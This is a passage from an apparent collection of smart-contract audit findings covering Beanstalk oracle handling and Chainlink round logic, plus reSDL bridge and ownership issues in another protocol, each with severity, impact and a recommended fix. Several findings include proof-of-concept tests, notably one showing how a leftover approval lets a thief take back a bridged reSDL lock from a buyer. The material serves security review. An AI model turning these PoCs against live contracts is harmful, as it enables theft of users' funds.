C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\n -Temperature and caseId are incorrectly adjusted when oracle failsчmediumчWhen user calls `gm` and the call for the chainlink oracle fails, it will return 0 for the `deltaB` value and this will cause a cascade effect, making the calculation of `caseId` = `3` and using the incorrect `caseId` to set up the new temperature on Weather.sol\\n```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n\\nEvery consumer of the temperature on the protocol will be affected like:\\n`LibDibbler.morningTemperature`\\n`LibDibbler.beansToPods`\\n`LibDibbler.remainingPods`\\n`Sun.setSoilAbovePeg`\\n`Sun.stepSun`\\n`FieldFacet.maxTemperature`\\n`FieldFacet.totalSoil`\\n`FieldFacet._totalSoilAndTemperature`\\n`FieldFacet.sowWithMin\\n`gm` function uses the incorrect deltaB(0) to calculate the `caseId` which is then used to set the temperature.\\n```\\n function gm(address account, LibTransfer.To mode) public payable returns (uint256) {\\n int256 deltaB = stepOracle(); // @audit here if oracle failed, we update the season.timestamp and return deltaB zero here\\n uint256 caseId = calcCaseIdandUpdate(deltaB); // @audit caseId will be 3 here if deltaB is zero\\n LibGerminate.endTotalGermination(season, LibWhitelistedTokens.getWhitelistedTokens());\\n LibGauge.stepGauge();\\n stepSun(deltaB, caseId); // @audit wrong deltaB and caseId used here, setting the abovePeg to false and soil to zero\\n }\\n```\\n\\nPrepare the environment to work with Foundry + Updated Mocks https://gist.github.com/h0lydev/fcdb00c797adfdf8e4816031e095fd6c\\nMake sure to have the mainnet forked through Anvil: `anvil --fork-url https://rpc.ankr.com/eth`\\nCreate the `SeasonTemperature.t.sol` file under the folder `foundry` and paste the code below. Then run `forge test --match-contract SeasonTemperatureTest -vv`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity =0.7.6;\\npragma abicoder v2;\\n\\nimport { Sun } from \"contracts/beanstalk/sun/SeasonFacet/Sun.sol\";\\nimport { MockSeasonFacet } from \"contracts/mocks/mockFacets/MockSeasonFacet.sol\";\\nimport { MockSiloFacet } from \"contracts/mocks/mockFacets/MockSiloFacet.sol\";\\nimport { MockFieldFacet } from \"contracts/mocks/mockFacets/MockFieldFacet.sol\";\\nimport { MockWhitelistFacet } from \"contracts/mocks/mockFacets/MockWhitelistFacet.sol\";\\nimport {LibWhitelist} from \"contracts/libraries/Silo/LibWhitelist.sol\";\\nimport { Utils } from \"./utils/Utils.sol\";\\nimport \"./utils/TestHelper.sol\";\\nimport \"contracts/libraries/LibSafeMath32.sol\";\\nimport \"contracts/C.sol\";\\n\\ncontract SeasonTemperatureTest is MockSeasonFacet, TestHelper {\\n using SafeMath for uint256;\\n using LibSafeMath32 for uint32;\\n\\n bool oracleFailed;\\n \\n function setUp() public {\\n console.log(\"diamondSetup\");\\n vm.createSelectFork('local');\\n oracleFailed = false;\\n setupDiamond();\\n dewhitelistCurvePool();\\n mintUnripeLPToUser1(); \\n mintUnripeBeanToUser1();\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n _setReservesForWell(1000000e6, 1000e18);\\n \\n // user / tokens\\n mintTokenForUsers();\\n setTokenApprovalForUsers();\\n \\n enableFertilizerAndMintActiveFertilizers();\\n\\n callSunriseForUser1();\\n }\\n\\n\\n //////////// Setup functions ////////////\\n\\n function setTokenApprovalForUsers() internal { \\n approveTokensForUser(deployer);\\n approveTokensForUser(user1);\\n approveTokensForUser(user2);\\n approveTokensForUser(user3);\\n approveTokensForUser(user4);\\n approveTokensForUser(user5);\\n }\\n\\n function mintTokenForUsers() internal { \\n mintWETHtoUser(deployer);\\n mintWETHtoUser(user1);\\n mintWETHtoUser(user2);\\n mintWETHtoUser(user3);\\n mintWETHtoUser(user4);\\n mintWETHtoUser(user5);\\n\\n // mint C.bean() to users\\n C.bean().mint(deployer, 10e6);\\n C.bean().mint(user1, 10e6);\\n C.bean().mint(user2, 10e6);\\n C.bean().mint(user3, 10e6);\\n C.bean().mint(user4, 10e6);\\n C.bean().mint(user5, 10e6);\\n }\\n\\n function approveTokensForUser(address user) prank(user) internal { \\n mockWETH.approve(address(diamond), type(uint256).max);\\n unripeLP.approve(address(diamond), type(uint256).max);\\n unripeBean.approve(address(diamond), type(uint256).max);\\n well.approve(address(diamond), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n }\\n\\n function dewhitelistCurvePool() public {\\n vm.prank(deployer);\\n whitelist.dewhitelistToken(C.CURVE_BEAN_METAPOOL);\\n }\\n\\n function mintWETHtoUser(address user) prank(user) internal {\\n mockWETH.mint(user, 1000e18);\\n }\\n\\n function mintUnripeLPToUser1() internal { \\n unripeLP.mint(user1, 1000e6);\\n }\\n\\n function mintUnripeBeanToUser1() internal { \\n unripeBean.mint(user1, 1000e6);\\n }\\n\\n function enableFertilizerAndMintActiveFertilizers() internal { \\n // second parameter is the unfertilizedIndex\\n fertilizer.setFertilizerE(true, 10000e6);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(7500, 1e11, 99);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(6200, 1e11, 99);\\n\\n addUnripeTokensToFacet();\\n }\\n\\n function addUnripeTokensToFacet() prank(deployer) internal { \\n unripe.addUnripeToken(C.UNRIPE_BEAN, C.BEAN, bytes32(0));\\n unripe.addUnripeToken(C.UNRIPE_LP, C.BEAN_ETH_WELL, bytes32(0));\\n }\\n\\n function callSunriseForUser1() prank(user1) internal {\\n _ensurePreConditions();\\n _advanceInTime(2 hours);\\n season.sunrise();\\n }\\n\\n function setOraclePrices(bool makeOracleFail, int256 chainlinkPrice, uint256 ethUsdtPrice, uint256 ethUsdcPrice) internal { \\n if (makeOracleFail) { \\n _addEthUsdPriceChainlink(0);\\n oracleFailed = true;\\n } else { \\n oracleFailed = false;\\n _addEthUsdPriceChainlink(chainlinkPrice);\\n _setEthUsdtPrice(ethUsdtPrice);\\n _setEthUsdcPrice(ethUsdcPrice);\\n }\\n }\\n\\n ////////////////////////////////////////// TESTS //////////////////////////////////////////\\n\\n function testWrongCalcId_whenOracleFails() public { \\n _prepareForAbovePeg();\\n _advanceInTime(1 hours);\\n uint256 _snapId = vm.snapshot();\\n \\n // When sunrise succeeds\\n vm.prank(user4);\\n season.sunrise();\\n\\n // Then print results\\n _printProtocolState();\\n assertEq(season.getT(), 5, \"when succeeds t should be 5\");\\n \\n // Then revert it to prepare for the season that will fail\\n vm.revertTo(_snapId);\\n\\n // Prepare for the season that will fail\\n setOraclePrices(true, 0, 0, 0);\\n\\n // When sunrise fails\\n vm.prank(user4);\\n season.sunrise();\\n\\n console.log(\"Oracle failed, see results\");\\n _printProtocolState();\\n assertEq(season.getT(), 1, \"when succeeds t should be 1\");\\n\\n }\\n\\n function _printProtocolState() internal { \\n console.log(\"-------------- Results --------------\");\\n console.log(\"\");\\n console.log(\"thisSowTime: \", season.thisSowTime());\\n console.log(\"lastSowTime: \", season.lastSowTime());\\n console.log(\"getUsdTokenPrice: \", season.getUsdTokenPrice());\\n console.log(\"getReserve0: \", season.getReserve0());\\n console.log(\"getReserve1: \", season.getReserve1());\\n console.log(\"getAbovePeg: \", season.getAbovePeg());\\n console.log(\"getSoil: \", season.getSoil());\\n console.log(\"lastDSoil: \", season.lastDSoil());\\n console.log(\"s.w.t: \", season.getT());\\n console.log(\"remaining pods: \", field.remainingPods());\\n } \\n\\n function _prepareForAbovePeg() internal { \\n season.mockSetSopWell(address(well));\\n season.captureWellE(address(well)); \\n season.setYieldE(5); // s.w.t\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n\\n season.setLastSowTimeE(1);\\n season.setNextSowTimeE(10);\\n season.calcCaseIdE(1e18, 1);\\n season.setAbovePegE(true);\\n }\\n\\n ////////////////////////////////////////// HELPERS //////////////////////////////////////////\\n\\n function _ensurePreConditions() internal { \\n assertTrue(season.thisSowTime() == type(uint32).max, \"thisSowTime should be max\");\\n assertTrue(season.lastSowTime() == type(uint32).max, \"thisLastSowTime should be max\");\\n assertEq(season.getIsFarm(), 1, \"isFarm should be 1\");\\n assertEq(season.getUsdTokenPrice(), 1, \"usdTokenPrice should be 1\");\\n assertEq(season.getReserve0(), 1, \"reserve0 should be 1\");\\n assertEq(season.getReserve1(), 1, \"reserve1 should be 1\");\\n assertFalse(season.getAbovePeg(), \"pre - abovePeg should be false\");\\n assertEq(season.getSoil(), 0, \"soil should be == 0\");\\n }\\n}\\n```\\n\\nOutput:\\n```\\n handleRain caseId: 0\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 462832752243\\n lastDSoil: 0\\n s.w.t: 5\\n remaining pods: 467461079765\\n\\nhandleRain caseId: 3\\n Oracle failed, see results\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 0\\n lastDSoil: 0\\n s.w.t: 1\\n remaining pods: 0\\n\\nSuite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.45s (3.32ms CPU time)\\n```\\n\\nps: a console.log was added to the `handleRain` function to print the caseId.\\nResult: In a normal scenario the temperature would have remained at the value `5` but in this case was set to `1` and remaining pods/soil are also set to zero when in fact they should not.чIt is noticed that the developers have the intention of never reverting the sunrise function to decrease the risk of depeg and breaking the incentive for users calling it. But at the same time, those state variables shouldn't be updated as if the system is working correctly because they will impact the next season as stated in this finding.\\nIt is tricky to propose a simple fix to the problem without impacting the system as a whole. Here are a few ideas that could be used:\\n(Recommended) An effective solution could be store the latest response from chainlink and in case it fails and the timeout(a limit that you can be added to accept a previous response from the oracle) is not reached yet, protocol could use the previous response. Liquity Protocol uses this approach, an example here: https://github.com/liquity/dev/blob/main/packages/contracts/contracts/PriceFeed.sol This solution will be effective for the protocol because the oracle is also called in different places like when minting fertilizers(getMintFertilizerOut), getting the well price(getRatiosAndBeanIndex), and `getConstantProductWell`. As the oracle is used along the protocol in many places, the `latest successful price` would be often up-to-date and within the limit time defined to use the previous price when the chainlink oracle fails.\\nAdditionally, consider handling the errors properly before updating the `deltaB` and `abovePeg` variables, as these disrupt the peg mechanism logic.чThe interest rate will be wrongly decreased to 1, compromising the protocol peg mechanism when it needs to be maintained with a high interest rate/ temperature.\\nSow will be calculated with the lowest temperature, also compromising the peg mechanism due to the wrong exchange of Beans -> Sow -> Pods\\nRemaining pods function will return zero and users will have an inaccurate number representing their actual pods.ч```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n -`Chainlink` oracle returns stale price due to `CHAINLINK_TIMEOUT` variable in `LibChainlinkOracle` being set to 4 hoursчmediumчThe `LibChainlinkOracle` library utilizes a `CHAINLINK_TIMEOUT` constant set to `14400` seconds (4 hours). This duration is four times longer than the `Chainlink` heartbeat that is `3600` seconds (1 hour), potentially introducing a significant delay in recognizing stale or outdated price data.\\nThe `LibChainlinkOracle::checkForInvalidTimestampOrAnswer` function accepts three input arguments: `timestamp`, `answer` and `currentTimestamp` and check if the return `answer` from `Chainlinlink Oracle` or the `timestamp` is invalid:\\n```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n\\nThe function also checks if the difference between the `currentTimestamp` and the `timestamp` is greater then `CHAINLINK_TIMEOUT`. The `CHAINLINK_TIMEOUT` is defined to be 4 hours:\\n```\\n uint256 public constant CHAINLINK_TIMEOUT = 14400; // 4 hours: 60 * 60 * 4\\n```\\nчConsider reducing the `CHAINLINK_TIMEOUT` to align more closely with the `Chainlink` heartbeat on Ethereum, enhancing the relevance of the price data.чThe `Chainlink` heartbeat indicates the expected frequency of updates from the oracle. The `Chainlink` heartbeat on Ethereum for `Eth/Usd` is `3600` seconds (1 hour).\\nhttps://docs.chain.link/data-feeds/price-feeds/addresses?network=ethereum&page=1&search=0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419\\nBut the defined `CHAINLINK_TIMEOUT` in the `LibChainlinkOracle` is `14400` seconds (4 hours).\\nA `CHAINLINK_TIMEOUT` that is significantly longer than the heartbeat can lead to scenarios where the `LibChainlinkOracle` library accepts data that may no longer reflect current market conditions. Also, in volatile markets, a 4-hour window leads to accepting outdated prices, increasing the risk of price slippage.ч```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n -[M] DOS in LibChainlinkOracle when not considering phaseIdчmediumч`LibChainlinkOracle` is not fully compatible with Chainlink's data model due to the lack of support for `phaseId and aggregatorRoundId`. Chainlink's `roundID` is a composite number combining a `phaseID and an aggregatorRoundID`.\\nThe `phaseID` changes whenever there is an upgrade to the underlying aggregator, and this change causes a significant jump in the `roundID` values due to the bit-shifting operation described in the documentation.\\nref here: https://docs.chain.link/data-feeds/historical-data#solidity\\nThe Beanstalk `LibChainlinkOracle` misinterprets the progression of `roundID` as sequential, overlooking Chainlink's unique bundling of `phaseId` and `aggregatorRoundId`. With the advancement of `phaseID`, there's an exponential increase in `roundID` by 2^64, leading to a temporal suspension until a new interval commences. This will instigate a denial-of-service scenario. The `getEthUsdTwap and getEthUsdPrice` functions are particularly susceptible to this vulnerability, as they rely on accurate TWAP values for their computations, which effects for example any calls reliant on Oracle data.\\n```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n\\n```\\n function latestRoundData()\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n Phase memory current = currentPhase; // cache storage reads\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = current.aggregator.latestRoundData();\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, current.id);\\n }\\n```\\n\\nhttps://etherscan.io/address/0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419#code\\nThe code segment extracted from the ETH/USD Chainlink aggregator above highlights the composite structure of `roundId`, integrating both `phaseId` and aggregatorRoundId. As highlighted, an increment in `phaseId` leads to a substantial leap in `roundId by 2^64`, thereby bypassing a number of \"rounds.\" Consequently, any attempt to query currentRound - 1 post-upgrade encounters a non-existent round, triggering a revert. This condition could persist up to 24 hours based on configuration, impacting the timely execution of getEthUsdTwap and getEthUsdPrice.\\nThese functions, once operational again, might utilize altered TWAP values for computations, diverging from expected outcomesчCheck return values of roundId. If the `roundID` is a nonzero value and is reverting then the oracle needs to try again with a lower `phaseId.`чIf a `phaseID` increment occurs, it results in a jump in ``````roundID values, creating a gap in the sequence. When there are attempts to access round data for `roundIDs` within this gap, it will encounter inaccurate rounds, potentially causing the function to fail or return incorrect data, considering when the `phaseID` is incremented the `roundID increases by 2 ** 64.` This discrepancy can lead to a denial-of-servicein any calls to the oracle.ч```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n -A user can steal an already transfered and bridged reSDL lock because of approvalчhighчThe reSDL token approval is not deleted when the lock is bridged to an other chain\\nWhen a reSDL token is bridged to an other chain, the `handleOutgoingRESDL()` function is called to make the state changes into the `sdlPool` contract. The function executes the following:\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n\\nAs we can see, it deletes the lock.amount of the lockId, removes the ownership of the lock and decrements the lock balance of the account that is bridging the lock. The approval that the user had before bridging the reSDL lock will remain there and he can get benefited from it by stealing the NFT. Consider the following situation: A user knows that there is a victim that is willing to pay the underlying value for a reSDL lock ownership transfer. What the malicious user can do is set approval to move his lockId in all supported chains to an alt address that he owns. Then, he trades the underlying value for the reSDL ownership and the lock is transfered to the victim/buyer. If the buyer keeps the lock in this chain nothing happens, but if he bridges any of the other supported chains, the malicious user can use the approval of his alt account to steal the reSDL lock.\\nIt is written inside `resdl-token-bridge.test.ts` because it uses its setup\\n```\\n it('PoC steal reSDL', async () => {\\n let lockId = 2\\n\\n let thief = accounts[0]\\n let victim = accounts[1]\\n\\n let thiefAccount2 = accounts[2]\\n\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n // Thief approves an alt account that he controls to move his lock in the original chain\\n await sdlPool.approve(thiefAccount2, lockId)\\n\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief bridges the lock to an other chain but the approval is not deleted\\n await bridge.transferRESDL(77, victim, lockId, true, toEther(10), { value: toEther(10) })\\n let lastRequestMsg = await onRamp.getLastRequestMessage()\\n assert.deepEqual(\\n ethers.utils.defaultAbiCoder\\n .decode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n lastRequestMsg[1]\\n )\\n .map((d, i) => {\\n if (i == 0) return d\\n if (i > 1 && i < 4) return fromEther(d)\\n return d.toNumber()\\n }),\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n )\\n assert.deepEqual(\\n lastRequestMsg[2].map((d) => [d.token, fromEther(d.amount)]),\\n [[sdlToken.address, 1000]]\\n )\\n assert.equal(lastRequestMsg[3], wrappedNative.address)\\n assert.equal(lastRequestMsg[4], '0x11')\\n await expect(sdlPool.ownerOf(lockId)).to.be.revertedWith('InvalidLockId()')\\n\\n // The user that received the lock from bridging on the other chain decides to bridge the lock id\\n // back to the original chain\\n await offRamp\\n .connect(signers[6])\\n .executeSingleMessage(\\n ethers.utils.formatBytes32String('messageId'),\\n 77,\\n ethers.utils.defaultAbiCoder.encode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n ),\\n sdlPoolCCIPController.address,\\n [{ token: sdlToken.address, amount: toEther(25) }]\\n )\\n\\n\\n // Now the victim owns the reSDL lock on the original chain\\n assert.equal(await sdlPool.ownerOf(2), victim)\\n\\n // However, this lockId has the approval that originally the thief set to his alt account and victim do not know that\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief transfers back to his main account the reSDL via his alt account\\n await sdlPool\\n .connect(signers[2])\\n .transferFrom(victim, thief, lockId)\\n\\n // Thief is now the owner of the reSDL\\n assert.equal(await sdlPool.ownerOf(2), thief)\\n })\\n```\\nчWhen bridging a lock between chains, the lock approval should be deleted.\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n \\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n// Add the line below\\n delete tokenApprovals[_lockId];\\n\\n uint256 totalAmount = lock.amount // Add the line below\\n lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] // Add the line below\\n= totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\nчHigh, possibility to steal fundsч```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n -Insufficient Gas Limit Specification for Cross-Chain Transfers in _buildCCIPMessage() method. WrappedTokenBridge.sol #210чlowчThe _buildCCIPMessage() function in the WrappedTokenBridge contract does not specify a gasLimit for the execution of the ccipReceive() function on the destination blockchain. This omission can lead to unpredictable gas costs and potential failure of the message processing due to out-of-gas errors.\\nThe Client.EVM2AnyMessage struct created by _buildCCIPMessage() is used to define the details of a cross-chain message, including the tokens to be transferred and the receiver's address. However, the struct lacks a gasLimit field in the extraArgs, which is crucial for determining the maximum amount of gas that can be consumed when the ccipReceive() function is called on the destination chain.\\nWithout a specified gasLimit, the default gas limit set by the CCIP router or the destination chain's infrastructure is used. This default may not align with the actual gas requirements of the ccipReceive() function, potentially leading to failed transactions or higher-than-expected fees.\\n` function _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({token: address(wrappedToken), amount: _amount}); tokenAmounts[0] = tokenAmount;\\n```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: \"\",\\n tokenAmounts: tokenAmounts,\\n extraArgs: \"0x\",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n\\n`чTo address the issue of not including a gasLimit in the _transferTokens method, we can take inspiration from the sendMessage() example and modify the _buildCCIPMessage function within the WrappedTokenBridge contract to include a gasLimit in the extraArgs field of the EVM2AnyMessage struct. This will ensure that the CCIP message sent to the destination blockchain includes a specified maximum amount of gas that can be consumed during the execution of the ccipReceive() function.\\nfunction _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({ token: address(wrappedToken), amount: _amount }); tokenAmounts[0] = tokenAmount;\\n// // Include a gasLimit in the extraArgs Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({ receiver: abi.encode(_receiver), data: \"\", tokenAmounts: tokenAmounts, extraArgs: Client._argsToBytes( Client.EVMExtraArgsV1({gasLimit: 200_000, strict: false}) // Additional arguments, setting gas limit and non-strict sequency mode ), feeToken: _feeTokenAddress });\\n```\\nreturn evm2AnyMessage;\\n```\\n\\n}\\nIncludes a gasLimit field, which is set to 200,000 in this example. This value should be adjusted based on the expected gas consumption of the ccipReceive() function on the destination chain. By including the gasLimit in the extraArgs, you ensure that the CCIP message has a specified maximum gas limit for execution, which can prevent out-of-gas errors and control the cost of the cross-chain transfer.чIf the default gas limit is too low, the ccipReceive() function may run out of gas, causing the transaction to fail on the destination chain.\\nWithout a specified gasLimit, the cost of sending a message can vary, making it difficult for users to predict the required fees.\\nIf the default gas limit is higher than necessary, users may overpay for gas that is not used, as unspent gas is not refunded.ч```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: \"\",\\n tokenAmounts: tokenAmounts,\\n extraArgs: \"0x\",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n -Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.чlowч`Ownable` contains a function named `renounceOwnership()` which can be used to remove the ownership of contracts in a protocol.\\nThis can lead to `SDLPoolCCIPControllerPrimary`, `SDLPoolCCIPControllerPrimary`, `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts becoming disowned, which will then break critical functions of the protocol.\\nThe `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts inherit from `Ownable`, `SDLPoolCCIPControllerPrimary` from `SDLPoolCCIPController` which inherits `Ownable`, and `SDLPoolCCIPControllerSecondary` inherits from SDLPoolCCIPControllerPrimary; and hence inherit `renounceOwnership()` function.\\nThe owner could accidentally (or intentionally) call `renounceOwnership()` which transfers ownership to `address(0)`. This will break numerous functions within each contract referenced that has the `onlyOwner()` modifier assigned. Below are a list of those functions:\\n`SDLPoolCCIPControllerPrimary`\\n`setRewardsInitiator()`\\n`setWrappedRewardToken()`\\n`approveRewardTokens()`\\n`removeWhitelistedChain()`\\n`addWhitelistedChain()`\\n`SDLPoolCCIPControllerSecondary`\\n`setExtraArgs()`\\n`WrappedTokenBridge`\\n`recoverTokens()`\\n`transferTokens()`\\n`LinearBoostController`\\n`setMaxLockingDuration()`\\n`setMaxBoost()`\\n`RESDLTokenBridge`.\\n`setExtraArgs()`\\nPOC\\nAdd this test to `test/core/ccip/sdl-pool-ccip-controller-primary.test.ts`\\n```\\n it.only('renounce ownership', async () => {\\n console.log(\"Owner before\", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(\"Set max link fee with onlyOwner modifier\", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(\"set max link fee hasn't changed\", await controller.maxLINKFee())\\n // console out the owner\\n console.log(\"Owner after\", await controller.owner())\\n \\n })\\n```\\nчAccidental `renounceOwnership()` call can disrupt key operations in multiple contracts.\\nDisable `renounceOwnership()` if function in the Ownable contract not required.\\n```\\n// Add the line below\\n function renounceOwnership() public override onlyOwner {\\n// Add the line below\\n revert (\"Not allowed\");\\n// Add the line below\\n }\\n```\\nчч```\\n it.only('renounce ownership', async () => {\\n console.log(\"Owner before\", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(\"Set max link fee with onlyOwner modifier\", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(\"set max link fee hasn't changed\", await controller.maxLINKFee())\\n // console out the owner\\n console.log(\"Owner after\", await controller.owner())\\n \\n })\\n```\\n -No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.чmediumчThere is no way to revoke the 